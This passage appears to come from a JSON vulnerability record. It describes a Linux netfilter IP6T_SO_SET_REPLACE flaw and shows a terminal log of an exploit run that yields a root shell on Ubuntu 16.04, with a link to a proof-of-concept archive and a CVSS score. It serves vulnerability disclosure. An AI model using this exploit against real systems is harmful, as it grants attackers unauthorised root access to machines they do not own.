netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,\n#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.\n\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls\ncompile.sh enjoy enjoy.c pwn pwn.c version.h\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables\n[sudo] password for zhang_q: \nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn \npwn begin, let the bullets fly . . .\nand wait for a minute . . .\npwn over, let's enjoy!\npreparing payload . . .\ntrigger modified tty_release . . .\ngot root, enjoy :)\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id\nuid=0(root) gid=0(root) groups=0(root)\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl \n Static hostname: ubuntu\n Icon name: computer-vm\n Chassis: vm\n Machine ID: 355cdf4ce8a048288640c2aa933c018f\n Virtualization: vmware\n Operating System: Ubuntu 16.04.1 LTS\n Kernel: Linux 4.4.0-21-generic\n Architecture: x86-64\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40489.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}